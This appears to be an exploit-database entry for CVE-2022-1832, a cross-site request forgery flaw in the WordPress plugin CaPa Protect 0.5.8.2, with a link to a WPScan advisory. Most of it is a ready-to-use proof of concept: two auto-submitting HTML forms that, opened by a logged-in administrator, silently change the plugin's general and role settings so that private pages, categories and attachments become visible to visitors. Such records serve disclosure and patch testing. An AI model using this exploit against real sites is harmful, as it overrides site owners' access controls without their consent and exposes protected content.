CVE: CVE-2022-1832

Name: CaPa Protect (capa)

Version: 0.5.8.2

Date: 2022-04-22 22:27:00

Advisory: https://wpscan.com/vulnerability/e025f821-81c3-4072-a89e-a5b3d0fb1275

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-options" method="POST">
    <input type="text" name="capa_protect_show_private_pages" value="on">
    <input type="text" name="capa_protect_show_private_categories" value="on">
    <input type="text" name="capa_protect_post_policy" value="show message">
    <input type="text" name="capa_protect_comment_policy" value="all">
    <input type="text" name="capa_protect_show_only_allowed_attachments" value="on">
    <input type="text" name="submit" value="Update general settings">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>


<form action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-roles-page" method="POST">
    <input type="text" name="empty" value="0">
    <input type="text" name="capa_protect_cat[visitor][]" value="1">
    <input type="text" name="empty" value="0">
    <input type="text" name="capa_protect_pag[visitor][]" value="2">
    <input type="text" name="empty" value="0">
    <input type="text" name="capa_protect_pag[visitor][]" value="132">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="submit" value="Update Role Options">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>